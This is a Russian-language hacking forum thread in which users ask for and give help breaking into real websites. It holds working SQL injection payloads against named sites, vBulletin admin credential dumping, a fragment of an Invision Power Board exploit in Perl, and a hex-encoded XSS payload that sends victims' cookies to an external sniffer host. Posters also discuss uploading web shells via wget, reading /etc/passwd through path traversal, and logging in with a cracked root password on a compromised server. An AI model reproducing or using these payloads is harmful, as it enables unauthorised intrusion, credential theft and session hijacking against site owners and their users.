Exp: test.php?id[]=asd";}'+WHERE+id=1--+

Return: UPDATE SET sortorder = 'a:1:{i:0;s:21:"asd";}' WHERE id=1-- ";}' WHERE id = 1

Need:magic_quotes=off

Комментом мы обрезали оставшийся кусок и в принципе должно работать...

Народ) 2 вопроса...

Вообщем первый по phpbb 3.0.7-PL1 залитие шелла через админ панель

Де то вычитал способ через востановление бд.. но тут трабла

Захожу в Maintenance

----------

Database>

Restore

Получаю текст


This will perform a full restore of all phpBB tables from a saved file. If your server supports it you may use a gzip or bzip2 compressed text file and it will automatically be decompressed. WARNING This will overwrite any existing data. The restore may take a long time to process please do not move from this page till it is complete. Backups are stored in the store/ folder and are assumed to be generated by phpBB’s backup functionality. Restoring backups that were not created by the built in system may or may not work.



Code:
There are no items yet.
т.е. как я понял востановить бд нельзя...

Просто есть пару админок пхпбб) незнаю как залить шелл... = \

2. Вопрос...и совершенно другой хост

Вообщем есть скуль... читение фалов через скуль и т.д. но только через CHAR. Как я понял safe_mode ON

Так же есть доступ к PMA, знаю полный путь к папкам доступным на запись... подскажите как залить шелл...

просто не сталкивался с safe_mode ON

инклуд не инклуд

Наткнулся на код, в котором значение из $_GET напрямую передается в класс PhpThumbFactory::create.. В этом классе происходит проверка на валидность входного IMG файла.. Т.е, если я подставляю:

?filename=/../../1.jpg , отображается соответственно сама картинка, находящаяся в корне.. При попытке прочитать реальную JPG, GIF, PNG, читается из любого места.. А вот прочитать файл другого формата не удается, все это проверяется, и мозгов у меня пока не хватает, чтобы сделать какие либо выводы..


PHP:
resize($width,$height);

$thumb->show();

$thumb->destruct();

?>



Существуют ли методы обхода, или как можно заставить PHP код выполниться в реальном IMG файле? И вообще, уязвимость ли это, или просто фича?

php 5.3.6

З.ы.:magic_quotes_gpc=Off,

З.ы.ы.: Проверка идет по mime типу и еще по нескольким параметрам..

Есть Бд с именем fotoforum

Делаю запрос


PHP:
table_name+from+information_schema.tables+where+ta ble_schema=fotoforum

Он возвращает ответ Unknown column 'fotoforum' in 'where clause' Как это понять??

.:GOGA:. said:
Есть Бд с именем fotoforum
Делаю запрос

PHP:
table_name+from+information_schema.tables+where+ta ble_schema=fotoforum

Он возвращает ответ Unknown column 'fotoforum' in 'where clause' Как это понять??


Нужно так:


Code:
SELECT+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+W HERE+TABLE_SCHEMA='fotoforum'

Если же фильтруются кавычки, можно зачарить:


Code:
SELECT+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+W HERE+TABLE_SCHEMA=CHAR(102,111,116,111,102,111,114 ,117,109)

Есть уязвимый форум на vBulletin . При просмотре администраторов через:


Code:
форум/showgroups.php

в группе Администраторы 3 человека.

Но когда в Live HTTP дописываю:


Code:
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE usergroupid=6#

то мне выдает всего 1 админа.

Как сделать чтобы все админы выводились? Или эти 2 остальных админа прописаны тупо для вида?

Cherep said:
Есть уязвимый форум на vBulletin . При просмотре администраторов через:

Code:
форум/showgroups.php

в группе Администраторы 3 человека.
Но когда в Live HTTP дописываю:

Code:
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE usergroupid=6#

то мне выдает всего 1 админа.
Как сделать чтобы все админы выводились? Или эти 2 остальных админа прописаны тупо для вида?


а если попробовать LIMIT ?


Code:
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE usergroupid=6 limit 0,1#



Code:
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE usergroupid=6 limit 1,1#



Code:
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE usergroupid=6 limit 2,1#

ne0k said:
Наткнулся на код, в котором значение из $_GET напрямую передается в класс PhpThumbFactory::create.. В этом классе происходит проверка на валидность входного IMG файла.. Т.е, если я подставляю:
?filename=/../../1.jpg , отображается соответственно сама картинка, находящаяся в корне.. При попытке прочитать реальную JPG, GIF, PNG, читается из любого места.. А вот прочитать файл другого формата не удается, все это проверяется, и мозгов у меня пока не хватает, чтобы сделать какие либо выводы..

PHP:
resize($width,$height);

$thumb->show();

$thumb->destruct();

?>



Существуют ли методы обхода, или как можно заставить PHP код выполниться в реальном IMG файле? И вообще, уязвимость ли это, или просто фича?
php 5.3.6
З.ы.:magic_quotes_gpc=Off,
З.ы.ы.: Проверка идет по mime типу и еще по нескольким параметрам..


Я так понимаю там стоит фреймворк PhpThumb, попробуй поискать сплоиты именно под него, например:

http://snipper.ru/view/8/phpthumb-179-arbitrary-command-execution-exploit/

на сайте есть пассивная xss в урле...но там идет только замена спец символов на их коды. больше никаких фильтров нет(100%) можно использовать как нибудь?

я реализовал xss, радовался жизнИ, потом админ поставил замену спец символов на html код.

Я так понимаю там стоит фреймворк PhpThumb, попробуй поискать сплоиты именно под него, например:
http://snipper.ru/view/8/phpthumb-179-arbitrary-command-execution-exploit/


Интересно.. Поиграюсь вечером..

Есть еще вопрос. Возможно ли провести sql inj при INSERT в БД данных из массива? При этом, данные, в массиве из $_POST, и ни коем образом не фильтруются...

Вот так:


PHP:
$wpdb->insert(TABLE,

array('type'=>$type,

'settings'=>serialize($settings),

'created'=>date("Y-m-d"),

'title'=>$_POST['title'],

'description'=>$_POST['description']));



Смог реализовать активную XSS.. Данные инсертятся в БД без какой либо фильтрации, соответственно потом, при выборке title и или description, срабатывает XSS на странице..

Но нужен скуль..

Может что еще можно сделать тут? Думаю, как бы реализовать выполнение кода, но к сожалению, страница, которая отображает содержимое этих двух ячеек, никак не воспринимается интэрпритатором php, т.е. если отправить постом '' а потом вывести на страницу, то будет просто навсего пустой тайтл или дискрипшн.. А в сорцах страницы отображается как есть: ....

Пока не знаю куда рыть дальше..

----------------------------------------------

Переменная $type получает свое значение из $_GET[type], но фильтруется :


PHP:
if(!empty=$_GET['type']) &&is_numeric($_GET['type'])

{

$type=$_GET[type];

}



и тут никак не пробиться, поэтому остается надеяться на $_POST[title] и $_POST[description] ...

извиняюсь если ошибся темой. колупал сегодня один форум.

методом подбора нашел в корневой файл tester.php

вот отрывок из него:


Fix bug_user privmsgs
2->11 total unreadprvmsgs- 18513->0 total unreadprvmsgs- 3->1 total unreadprvmsgs- 4->0 total unreadprvmsgs- 5->0 total unreadprvmsgs- 6->0 total unreadprvmsgs- 7->0 total unreadprvmsgs- 8->0 total unreadprvmsgs- 9->0 total unreadprvmsgs- 10->0 total unreadprvmsgs- 11->0 total unreadprvmsgs- 13->1 total unreadprvmsgs- 14->0 total unreadprvmsgs- 17->0 total unreadprvmsgs- 18->0 total unreadprvmsgs- 19->0 total
и дальше бла бла бла...


при запросе: tester.php?=start=2000'

выдает следующее


phpBB : Критическая ошибка Error doing DB query userdata row fetch DEBUG MODE SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '', 1' at line 4 SELECT user_id, username, user_unread_privmsg FROM users WHERE user_active = 1 LIMIT 2000', 1 Line : 26 File : test.php


вопрос можно ли дальше что-то сделать?

Tiku$ said:
извиняюсь если ошибся темой. колупал сегодня один форум.
методом подбора нашел в корневой файл tester.php
вот отрывок из него:
при запросе: tester.php?=start=2000'
выдает следующее
вопрос можно ли дальше что-то сделать?


tester.php?start=2,22222222+union+select+1,2,3--+

Expl0ited,


504 Gateway Time-out
nginx/0.7.67


Moriarty, не подскажешь может статья какая-то есть? а то я первый раз))

Tiku$ said:
Expl0ited,
Moriarty, не подскажешь может статья какая-то есть? а то я первый раз))


/thread43966.html

Moriarty said:
Статья хз...всё практика)
Вообщем инъекция в LIMIT есть тогда, когда нету ORDER BY.
А ошибка пропадет, когда количество колонок правильное подберешь (в данном случае таблицы users)...
Короче не ленись: 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18


Если бы твой опыт подсказал обратить внимание на запрос к бд который вываливается в ошибке:


Code:
SELECT user_id, username, user_unread_privmsg FROM users WHERE user_active = 1 LIMIT 2000', 1

то ты сразу бы заметил, что в данном случае всего три колонки участвующий в запросе user_id, username, user_unread_privmsg, соответственно иъекция должна быть вида:

union select 1,2,3#

почему при использовании эксплойта в перл, при выводе

MySQL version:

Data dir:

User:

Database:

id:

group:

Все строки пустые?

потому что гладиолус....какой експлоит ?..кaк вбивал данные..и тд и тп..?

[CODE]
Code:
#!/usr/bin/perl

## Invision Power Board SQL injection exploit by RTC-GNC-XxxEmchExxX
## vulnerable forum versions : 1.* , 2.* ,3.*( 0){
print qq{bb DONE ]

MEMBER ID : $member_id
};
print (($target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : '));
print $allchar."\r\n";
}
else
{
print "\b\b FAILED ]";
}
exit();
}
else
{
$allchar .= chr(42);
}
$s_num++;
}

sub found($$)
{
my $fmin = $_[0];
my $fmax = $_[1];
if (($fmax-$fmin)new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");

printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n",
$path,$server,$cmember_id,$pass_hash1,$cmember_id, $pass_hash2,$pass_hash3,$nmalykh);

while()
{
if (/Set-Cookie: session_id=0;/) { return 1; }
}

return 0;
}

sub status()
{
$status = $n % 5;
if($status==0){ print "\b\b/]"; }
if($status==1){ print "\b\b-]"; }
if($status==2){ print "\b\b\\]"; }
if($status==3){ print "\b\b|]"; }
}

sub usage()
{
print q(
Invision Power Board v

ne0k said:
Интересно.. Поиграюсь вечером..
Есть еще вопрос. Возможно ли провести sql inj при INSERT в БД данных из массива? При этом, данные, в массиве из $_POST, и ни коем образом не фильтруются...
Вот так:

PHP:
$wpdb->insert(TABLE,

array('type'=>$type,

'settings'=>serialize($settings),

'created'=>date("Y-m-d"),

'title'=>$_POST['title'],

'description'=>$_POST['description']));



Смог реализовать активную XSS.. Данные инсертятся в БД без какой либо фильтрации, соответственно потом, при выборке title и или description, срабатывает XSS на странице..


Возможно провести инъекцию если есть вывод ошибки. Процитирую сообщение s4avrd0w:


SQLi в Insert/Update/Delete/etc
Все знают, что склеивание строк в MySQL происходит с использованием функций concat() и concat_ws(), а также с использованием комментариев /**/ и /*!12345*/, или, с использованием "размешивания" кавычек "1"'2'"3" и '1'"2"'3'.
Но не все знают, что MySQL поддерживает все следующие операнды для работы со строками:
+, -, =, &, |, &&, ||, , =, !=, <>, ^, *, >, <>, %, /, , or not, and not, div, xor, or, and
помимо привычных like, sounds like, regexp, rlike, not like, not regexp и т.д.
Так, запросы вида:
select * from users where name = 'te'+'st';
select * from users where name = 'te'='st';
вернут все содержимое таблицы users т.к. (select 'te'+'st') и (select 'te'='st') = 0
А запросы вида (select 'te'%'st') и (select 'te'/'st') = NULL и потому, в приведенной выше конструкции, аналогичным образом указанные запросы вернут содержимое всей таблицы.
Стоит сказать, что символы + и - можно "плодить" до бесконечности. И только, когда будет достигнут лимит строки (у меня это 1048577) результатом станет NULL.
К слову, для конструкций вида:
!=!, !=!!, !=!!! … !=!!!!! или !=!!>! или !=!! или !=!~!~! или !=!+! или !=!-!
это утверждение также справедливо.
Все приведенное выше находит свое применение, когда SQLi попадает в строковый параметр. И если в selection-based инъекциях можно на это особо не заморачиваться, то при эксплуатации инъекций в insert/update/delete/etc с этим приходится сталкиваться. Примеры:
/*(1)*/ insert into users (id,name) values (1,'sqli');
mysql> insert into users (id,name) values (1,''&(select 1 from(select count(*),concat((select user()from information_schema.tables limit 0,1),0x3a,floor(rand(0)*2))x from information_schema.tables group by x)a));
ERROR 1062 (23000): Duplicate entry 'root@localhost:1' for key 'group_key'
в http/get:
/index.php?s='%2b(select+1+from(select+count(*),con cat((select+user ()+from+information_schema.tables+limit+0,1),0x3a, floor(rand(0)*2))x+from+information_schema.tables+ group+by+x)a)%2b'
/index.php?s='%26(select+1+from(select+count(*),con cat((select+user ()+from+information_schema.tables+limit+0,1),0x3a, floor(rand(0)*2))x+from+information_schema.tables+ group+by+x)a)%26'
/*(2)*/ insert into users set name='sqli';
mysql> insert into users set name=''div(select 1 from(select count(*),concat((select user()from information_schema.tables limit 0,1),0x3a,floor(rand(0)*2))x from information_schema.tables group by x)a)!=!!!'';
ERROR 1062 (23000): Duplicate entry 'root@localhost:1' for key 'group_key'
mysql> insert into users set name=''and(select 1 from(select count(*),concat((select user()from information_schema.tables limit 0,1),0x3a,floor(rand(0)*2))x from information_schema.tables group by x)a)or'';
ERROR 1062 (23000): Duplicate entry 'root@localhost:1' for key 'group_key'
Для Update/Delete запросы аналогичным образом будут работать.

Вопрос, если пишет при поиске пароля через перл - FAILED , то значит что фикс?

И еще вопрос, что в перле означает target?

WTSBugzoff said:
Вопрос, если пишет при поиске пароля через перл - FAILED , то значит что фикс?
И еще вопрос, что в перле означает target?


да...цель

делаю start=99999999+union+select+1,2,3--+

и сервер не отвечает, на большинство остальных заросов типа start=99999999+union+select+1,2,3,4,5--+ он нормально реагирует и выдает ошибку

почему так?

Tiku$ said:
делаю start=99999999+union+select+1,2,3--+
и сервер не отвечает, на большинство остальных заросов типа start=99999999+union+select+1,2,3,4,5--+ он нормально реагирует и выдает ошибку
почему так?


скорее всего получившиеся данные обрабатывается еще каким-то способом, что ведет к глобальному фейлу скрипта, попробуй сделать так:

start=99999999+union+select+1111,null,null--+

start=99999999+union+select+null,2222,null--+

start=99999999+union+select+null,null,3333--+

Подскажите плз, ISP managerПароли к админке держит в БАЗЕ?

спасибо

stasiliy said:
Подскажите плз,
ISP manager
Пароли к админке держит в БАЗЕ?
спасибо


Нет - если ты про бд.

прошу помочь с скулем не могу раскрутит


Code:
https://localhost.com/account/signIn
POST
email=eeee%40eeeee.ee&signinfrom=private&password=pppppp'

There was an SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''pppppp'' AND (c.password is not null AND c.password != '')' at line 4 - SELECT c.* FROM customer c WHERE c.email = 'eeee@eeeee.ee' AND c.password = 'pppppp'' AND (c.password is not null AND c.password != '')


Code:
POST
email=eeee%40eeeee.ee&signinfrom=private&password=pppppp' or 'x'='x'

There was an SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''x'' AND (c.password is not null AND c.password != '')' at line 4 - SELECT c.* FROM customer c WHERE c.email = 'eeee@eeeee.ee' AND c.password = 'pppppp' or 'x'='x'' AND (c.password is not null AND c.password != '')


Code:
POST
email=eeee%40eeeee.ee&signinfrom=private&password=pppppp+or(1,2)=(select+count(*),concat((s elect+version()+from+information_schema.tables+lim it+0,1),0x3a,floor(rand()*2))+from+information_sch ema.tables+group+by+2+limit+0,1)--+

There was an SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'or(1,2)=(select+count(*),concat((select+version() +from+information_schema.tables' at line 4 - SELECT c.* FROM customer c WHERE c.email = 'eeee@eeeee.ee' AND c.password = 'pppppp'+or(1,2)=(select+count(*),concat((select+v ersion()+from+information_schema.tables+limit+0,1) ,0x3a,floor(rand()*2))+from+information_schema.tab les+group+by+2+limit+0,1)--+' AND (c.password is not null AND c.password != '')

тока email=eeee%40eeeee.ee&signinfrom=private&password=pppppp' or 'x'='x норм отображается но order by не катет

подскажите что делать дальше, на сайте вместо Username: и Password: ввожу этот скрипт ">alert(/xss/) дальше выскакует окно /XSS/ жму ОК. в поле Username: стоит \\\\\\\\\\" на против этого поля это name=username> в адресной стороке это ххх.com/?a=login&say=invalid_login&username=\\">al ert(/xss/) подскажите что дальше?

Кто то работал с сайтами ucoz (сейчас есть уязвимость по превод пользователей с категории в категорию) - много шума это поднимает сейчас

( у кого то скрипты есть )

ridik77 said:
подскажите что делать дальше, на сайте вместо Username: и Password: ввожу этот скрипт ">alert(/xss/) дальше выскакует окно /XSS/ жму ОК. в поле Username: стоит \\\\\\\\\\" на против этого поля это name=username> в адресной стороке это ххх.com/?a=login&say=invalid_login&username=\\">al ert(/xss/) подскажите что дальше?


Это дело называется пасивная XSS, ты можешь поставить где нить снифер, и подсунуть ссылку админу

ххх.com/?a=login&say=invalid_login&username=\\">document.location="SNIFFER"+document.cookie за счет чего получишь админские куки и если повезет сможешь под его куками войти в админку

YuNi|[c said:
прошу помочь с скулем не могу раскрутит

Code:
https://localhost.com/account/signIn
POST
email=eeee%40eeeee.ee&signinfrom=private&password=pppppp'

There was an SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''pppppp'' AND (c.password is not null AND c.password != '')' at line 4 - SELECT c.* FROM customer c WHERE c.email = 'eeee@eeeee.ee' AND c.password = 'pppppp'' AND (c.password is not null AND c.password != '')

Code:
POST
email=eeee%40eeeee.ee&signinfrom=private&password=pppppp' or 'x'='x'

There was an SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''x'' AND (c.password is not null AND c.password != '')' at line 4 - SELECT c.* FROM customer c WHERE c.email = 'eeee@eeeee.ee' AND c.password = 'pppppp' or 'x'='x'' AND (c.password is not null AND c.password != '')

Code:
POST
email=eeee%40eeeee.ee&signinfrom=private&password=pppppp+or(1,2)=(select+count(*),concat((s elect+version()+from+information_schema.tables+lim it+0,1),0x3a,floor(rand()*2))+from+information_sch ema.tables+group+by+2+limit+0,1)--+

There was an SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'or(1,2)=(select+count(*),concat((select+version() +from+information_schema.tables' at line 4 - SELECT c.* FROM customer c WHERE c.email = 'eeee@eeeee.ee' AND c.password = 'pppppp'+or(1,2)=(select+count(*),concat((select+v ersion()+from+information_schema.tables+limit+0,1) ,0x3a,floor(rand()*2))+from+information_schema.tab les+group+by+2+limit+0,1)--+' AND (c.password is not null AND c.password != '')
тока email=eeee%40eeeee.ee&signinfrom=private&password=pppppp' or 'x'='x норм отображается но order by не катет




Code:
email=eeee%40eeeee.ee&signinfrom=private&password=pppppp'+or(1,2)=(select+count(*),concat(( select+version()+from+information_schema.tables+li mit+0,1),0x3a,floor(rand()*2))+from+information_sc hema.tables+group+by+2+limit+0,1) or 'x'='x

Так попробуй (только не забудь удалить пробелы, которые форум подставляет)

ZARO said:

Code:
email=eeee%40eeeee.ee&signinfrom=private&password=pppppp'+or(1,2)=(select+count(*),concat(( select+version()+from+information_schema.tables+li mit+0,1),0x3a,floor(rand()*2))+from+information_sc hema.tables+group+by+2+limit+0,1) or 'x'='x

Так попробуй (только не забудь удалить пробелы, которые форум подставляет)




There was an SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'or(1,2)=(select+count(*),concat((select+version() +from+information_schema.tables' at line 4 - SELECT c.* FROM customer c WHERE c.email = 'eeee@eeeee.ee' AND c.password = 'pppppp'+or(1,2)=(select+count(*),concat((select+v ersion()+from+information_schema.tables+limit+0,1) ,0x3a,floor(rand()*2))+from+information_schema.tab les+group+by+2+limit+0,1) or 'x'='x' AND (c.password is not null AND c.password != '')

спс не подходит чет стукнул в пм

winstrool, это как поставить где нибуть снифер? я зареган на hacker-pro, здесь есть такой ява скрипт-

img = new Image(); img.src = "http://httpz.ru/nypbi4u80f5.gif?"+document.cookie;

и есть ява скрипт для адресной строки- javascript:document.write('img = new Image(); img.src = "http://httpz.ru/nypbi4u80f5.gif?"+document.cookie;')

куда и как подставлять? куки должны сразу прейти или надо ждать?

YuNi|[c, во первых - раз у тебя данные передаются _POST методом, то символ плюс (+) использовать не нужно, т.к. это аналог пробела, и в твоем случае этот символ попадает так как есть.

во-вторых в конце обязательно нужен комментарий, в качестве которого достаточно использовать символ решетки (#)

в-третьих попробуй так:


Code:
email=a@a.com&signinfrom=private&password=x'or(select(max(1))from(customer)group by(concat(version(),0x00,floor(rand(0)*2))))#

Пытаюсь эксплуатировать Stack Overflow в обычном strcpy(). Успешно переписал адрес возврата из функции, но перед возвратом вызывается проверка:


Code:
call __security_check_cookie

Есть ли способы её обойти?

Windows XP

ridik77 said:
winstrool, это как поставить где нибуть снифер? я зареган на hacker-pro, здесь есть такой ява скрипт-
img = new Image(); img.src = "http://httpz.ru/nypbi4u80f5.gif?"+document.cookie;
и есть ява скрипт для адресной строки- javascript:document.write('img = new Image(); img.src = "http://httpz.ru/nypbi4u80f5.gif?"+document.cookie;')
куда и как подставлять? куки должны сразу прейти или надо ждать?


в твоем случае в адресную строку следовательно и скрипт нужно для адресной строки, такжже чтоб сильно глаза не резало, переведи в хекс, прийдется подождать пока админ перейдет по ссылке...

P/S:вот подготовил код твоего снифака тебе остается подставить только название сайта:


ххх.com/?a=login&say=invalid_login&username=%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%7 5%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%22%68% 74%74%70%3a%2f%2f%68%74%74%70%7a%2e%72%75%2f%6e%79 %70%62%69%34%75%38%30%66%35%2e%67%69%66%3f%22%2b%6 4%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f% 73%63%72%69%70%74%3e

winstrool спасибо, ввел в адресною строку и поле Username: осталось а поле Password: исчезло.

и еще я вводил скрипт не помню какой но выскочило это: PHP SESSID= 0bd2283e6ef3fb5919658b34c3b460ec что это?

ridik77 said:
winstrool спасибо, ввел в адресною строку и поле Username: осталось а поле Password: исчезло.
и еще я вводил скрипт не помню какой но выскочило это: PHP SESSID= 0bd2283e6ef3fb5919658b34c3b460ec что это?


Куки это. Обратись к стандартному мануалу по использованию XSS:

http://ha.ckers.org/xss.html

/showthread.php?t=42326

/thread20140.html

Собсно такой вопрос... в шопе к продукту вместо pdf файла залил шелл

затем захожу в продукт и вижу свой файл мол shell.php, тыкаю по нему, мне вылазит мол сохранить файл.

Сылка скачки фала такого вида

http://site.com/getfile.php?id=346 можно ли как то определить где хранится сам файл что бы его выполнить?

http://www.multiplaz.ru/download//..%252f..%252f..%252f..%252f..%252f..%252f..%252f. .%252fetc/passwd

от этого можно получить что то большее? чем раскрытие путей

GroM88 said:
Собсно такой вопрос... в шопе к продукту вместо pdf файла залил шелл
затем захожу в продукт и вижу свой файл мол shell.php, тыкаю по нему, мне вылазит мол сохранить файл.
Сылка скачки фала такого вида
http://site.com/getfile.php?id=346 можно ли как то определить где хранится сам файл что бы его выполнить?


Скорее всего в базе

погомогите плз!

собственно нашёл blind,но не могу раскрутить!


Code:
http://elecsnet.ru/search/?rid=23359

Faaax said:
погомогите плз!
собственно нашёл blind,но не могу раскрутить!

Code:
http://elecsnet.ru/search/?rid=23359



в каком месте тут скуль?

Интересует такой вопрос в книге по безопасности php говорилось допустим у нас есть запрос на выбору

mysql_query ("SELECT * FROM user WHERE id='$id'");

$id = числу но можно подставить следующие при должно проверки

$id= 10 OR nick=ADMIN и запрос будет типа

mysql_query ("SELECT * FROM user WHERE id='10 OR nick=ADMIN'");

в вожу в адресной строке следующее

http://site.ru/user.php?id=10 or nick=ADMIN

почему не срабатывает? обработки id нету ибо я сам писал запрос

PATCH said:
Интересует такой вопрос в книге по безопасности php говорилось допустим у нас есть запрос на выбору
mysql_query ("SELECT * FROM user WHERE id='$id'");
$id = числу но можно подставить следующие при должно проверки
$id= 10 OR nick=ADMIN и запрос будет типа
mysql_query ("SELECT * FROM user WHERE id='10 OR nick=ADMIN'");
в вожу в адресной строке следующее
http://site.ru/user.php?id=10 or nick=ADMIN
почему не срабатывает? обработки id нету ибо я сам писал запрос


у тебя в запросе ID передается как string (оно в ковычках), чтобы попасть в тело запроса, нужно сначало выйти за предела id, получится id='10' or nick='ADMIN'

данный тип иньекции требует отключенный magic quotes

ты прав с включеным magic quotes не работает однако насчет '$id' в ковычках ты не прав я попробовал такой запрос сделать

id=1' or nick='ADMIN

получаем

mysql_query ("SELECT * FROM user WHERE id='1' or nick='ADMIN'");

все равно большое спасибо за разъяснение

Expl0ited said:
YuNi|[c, во первых - раз у тебя данные передаются _POST методом, то символ плюс (+) использовать не нужно, т.к. это аналог пробела, и в твоем случае этот символ попадает так как есть.
во-вторых в конце обязательно нужен комментарий, в качестве которого достаточно использовать символ решетки (#)
в-третьих попробуй так:

Code:
email=a@a.com&signinfrom=private&password=x'or(select(max(1))from(customer)group by(concat(version(),0x00,floor(rand(0)*2))))#



сорри не думал о + спасибо получилос

PATCH said:
ты прав с включеным magic quotes не работает однако насчет '$id' в ковычках ты не прав я попробовал такой запрос сделать
id=1' or nick='ADMIN
получаем
mysql_query ("SELECT * FROM user WHERE id='1' or nick='ADMIN'");
все равно большое спасибо за разъяснение


ну да, а что не так? последняя ковычка после ADMIN'" это ковычка для закрытия запроса, так как mysql_query принимает строку, естественно запрос нужно взять в ковычки, а на синтаксис запроса они никак не влияют

Сорри если не там пишу) но надо срочно узнать)

Вообщем рутанул сервак, расшифровал пасс от рута

пытаюсь подключится через WinScp на стандартный порт 22, но нет конекта...

кто знает как можно узнать порт?

мб он гдето вписан в каком нить файле на сервере?

сервак FreeBSD

или же придется сканить на открытые порты?

GroM88, смотри тут /etc/ssh/sshd_config

GroM88 said:
Сорри если не там пишу) но надо срочно узнать)
Вообщем рутанул сервак, расшифровал пасс от рута
пытаюсь подключится через WinScp на стандартный порт 22, но нет конекта...
кто знает как можно узнать порт?
мб он гдето вписан в каком нить файле на сервере?
сервак FreeBSD
или же придется сканить на открытые порты?


Мне кажется быстрее выполнить nmap -sS IP-сервера, чем ждать ответа.

А вообще чаще доступ по SSH извне закрыт.

GroM88, смотри тут /etc/ssh/sshd_config


спс) узнал порт)

теперь другой вопрос...

из файла /etc/master.passwd вырвал root:hash - хэш расшифровал

пытаюсь зайти через winscp пишу root;pass

мне пишет Acces deined = \

почему?

GroM88, а у root в /etc/master.passwd оболочка какая? не /usr/sbin/nologin?

&:/root:/usr/local/bin/bash

Тут один чел подсказал что возможно стоит ограничение по ип и т.п.

и еще вопрос за что отвечает функция

PermitRootLogin yes в /etc/ssh/ssh_config

GroM88,

PermitRootLogin

Разрешить пользователю root вход через протокол SSH. Возможные значения: "yes", "without-password", "forced-commands-only", "no". Если директива установлена в "without-password" вход для пользователя root по паролю, будет запрещен. Значение "forced-commands-only" разрешает регистрацию пользователя root по открытому ключу, но только если установлен параметр command ( может пригодиться для удалённого создания резервных копий, даже если вход пользователя root по протоколу SSH, в обычном режиме запрещен ). Остальные способы аутентификации для пользователя root будут запрещены.

Значение по умолчанию "no", удаленный вход в систему пользователем root, полностью запрещён.

Что-то туплю, натолкните на верный путь.

Есть уязвимый скрипт перловый, уязвимость в виде возможности удаленных команд оси.

Пробовал залить шел (wso) через wget заливается, но если пробовать зайти при вводе пароля обновляется страница и выводит снова ввод пароля т.е. дальше не идет.

Что не так?

Собственно цель добраться до базы. Может кто посоветует в какую сторону рулить?

AKYLA said:
Что-то туплю, натолкните на верный путь.
Есть уязвимый скрипт перловый, уязвимость в виде возможности удаленных команд оси.
Пробовал залить шел (wso) через wget заливается, но если пробовать зайти при вводе пароля обновляется страница и выводит снова ввод пароля т.е. дальше не идет.
Что не так?
Собственно цель добраться до базы. Может кто посоветует в какую сторону рулить?



залей шелл, который сессии не юзает. Или убери авторизацию в WSO

Столкнулся с проблемой - не могу закомментировать скулю, чтобы ошибку не выдавало.

Параметр ?id=f'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND page_type != 'main' AND date1_formatted

можно ли обойти фильтрацию сделаную на php функции mysqli_real_escape_string

то есть все спец символы проходят но перед ними ставиться слеш \

ysmat said:
можно ли обойти фильтрацию сделаную на php функции mysqli_real_escape_string
то есть все спец символы проходят но перед ними ставиться слеш \


Нет. Есть некоторые условия при которых можно обойти эту функцию, но это случается очень редко.

хорошо тогда почему не вызывают ошибку

запросы где ковычка указана в не явном виде

например

SELECT * FROM pref_users where name='hvkjhv char(39) iuy'

SELECT * FROM pref_users where name='hvkjhv 0x27 iuy'

в зти запросы функция mysqli_real_escape_string

ничего не добавила но они не работают

ysmat said:
хорошо тогда почему не вызывают ошибку
запросы где ковычка указана в не явном виде
например
SELECT * FROM pref_users where name='hvkjhv char(39) iuy'
SELECT * FROM pref_users where name='hvkjhv 0x27 iuy'
в зти запросы функция mysqli_real_escape_string
ничего не добавила но они не работают


char и hex это не явный вид, а так как данные попадают в кавычки mysql воспринимает их как простую строку по этому ошибки и нет, и т.к. таких данных в колонке name нет возвращается false

Code:
http://www.unistream.ru/press/detail.php?ID=18667

помогите кто нить раскрутить!

4 ветка,но фильтруется пробел,кавычка,коментарии!

Faaax said:

Code:
http://www.unistream.ru/press/detail.php?ID=18667

помогите кто нить раскрутить!
4 ветка,но фильтруется пробел,кавычка,коментарии!


Мне пишет


Forbidden
Access denied.


Не могу посмотреть.

Faaax said:

Code:
http://www.unistream.ru/press/detail.php?ID=18667

помогите кто нить раскрутить!
4 ветка,но фильтруется пробел,кавычка,коментарии!


Покажи мне запросы по которым ты определил что там скуля

Konqi said:
Покажи мне запросы по которым ты определил что там скуля


через BENCHMARK определил,но уже пишет форбиденн

Konqi said:
Покажи мне запросы по которым ты определил что там скуля


int или intval в скрипте убери, тогда увидешь

попугай said:
int или intval в скрипте убери, тогда увидешь


в каком скрипте?

Faaax said:
в каком скрипте?


В этом параметре нету уязвимости. =\

ошибка на гл странице dle сайт


Code:
Deprecated: Function ereg() is deprecated in [PATH]/engine/modules/register.php on line 41

можно ли что то извлеч? или узнать версию?

стоит нулл


DataLife Engine Nulled by M.I.D-Team (http://www.mid-team.ws)


примерно версии середины лета 2009 года (точно хз не работал с dle)

Нет.

WAF help please

http://www.pampling.com/ficha_producto.php?id_producto=27%27+/*!union*/+select+1,2,3,4+--+

